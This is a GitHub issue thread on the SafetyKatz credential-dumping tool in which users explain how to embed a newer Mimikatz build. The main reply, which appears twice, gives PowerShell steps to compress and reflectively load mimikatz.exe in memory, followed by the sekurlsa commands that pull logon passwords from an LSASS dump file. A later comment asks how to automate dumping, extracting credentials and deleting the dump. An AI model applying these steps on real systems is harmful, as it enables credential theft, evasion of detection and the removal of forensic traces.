SafetyKatz icon indicating copy to clipboard operation
SafetyKatz copied to clipboard
verified publisher icon GhostPack

how to upgrade build in Mimikatz to latest version ?

Open wxlg1117 opened this issue 6 years ago • 2 comments

build in version is mimikatz 2.1.1 and latest version is 2.2.0 please

wxlg1117 avatar May 24 '19 05:05 wxlg1117

Import Powersploit module from here: Powersploit

Import-Module .\PowerSploit.psd1

Compile new Mimikatz... I'll leave that to you. Run Out-COmpressedDll against mimikatz.exe and dump to text file

Out-CompressedDll .\mimikatz.exe > mimikatz.txt

Grab all the data between

'' ignoring $EncodedCompressedFile = @' and @
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
$UncompressedFileBytes = New-Object Byte[](1119232)
$DeflatedStream.Read($UncompressedFileBytes, 0, 1119232) | Out-Null
[Reflection.Assembly]::Load($UncompressedFileBytes)
You just want the encoded bytes, nothing else.

View Program.cs in the SafetyKatz project and modify the array size of Byte[] unpacked = new byte[1200000]; to the size of your new mimikatz executable. In my case it was 1100000 bytes. Lines 111 and 116 respectively.

Next, Under constants.cs place the new string you generated from mimikatz.txt. Compile and enjoy. Note, the original developer was automatically working with the dump file generated, this will just get you a functional mimikatz where you can execute the proper commands to interact with the dump file. For example sekurlsa::minidump C:\WINDOWS\Temp\debug.bin sekurlsa::logonpasswords full

Enjoy!

ineffectivecoder avatar Jul 19 '19 22:07 ineffectivecoder

Import Powersploit module from here: Powersploit

Import-Module .\PowerSploit.psd1

Compile new Mimikatz... I'll leave that to you. Run Out-COmpressedDll against mimikatz.exe and dump to text file

Out-CompressedDll .\mimikatz.exe > mimikatz.txt

Grab all the data between

'' ignoring $EncodedCompressedFile = @' and @
$DeflatedStream = New-Object IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String($EncodedCompressedFile),[IO.Compression.CompressionMode]::Decompress)
$UncompressedFileBytes = New-Object Byte[](1119232)
$DeflatedStream.Read($UncompressedFileBytes, 0, 1119232) | Out-Null
[Reflection.Assembly]::Load($UncompressedFileBytes)
You just want the encoded bytes, nothing else.

View Program.cs in the SafetyKatz project and modify the array size of Byte[] unpacked = new byte[1200000]; to the size of your new mimikatz executable. In my case it was 1100000 bytes. Lines 111 and 116 respectively.

Next, Under constants.cs place the new string you generated from mimikatz.txt. Compile and enjoy. Note, the original developer was automatically working with the dump file generated, this will just get you a functional mimikatz where you can execute the proper commands to interact with the dump file. For example sekurlsa::minidump C:\WINDOWS\Temp\debug.bin sekurlsa::logonpasswords full

Enjoy!

awesome work bro!! And here is an another problem is that I want to use the mimi like oringinal developer in this program, which means I want the program to execute "dumpfile & dump creds & delete debug.bin" automatically, is there any ways to do with mimi? Please check this.

Thanks a lot.

NickYan7 avatar Aug 06 '21 08:08 NickYan7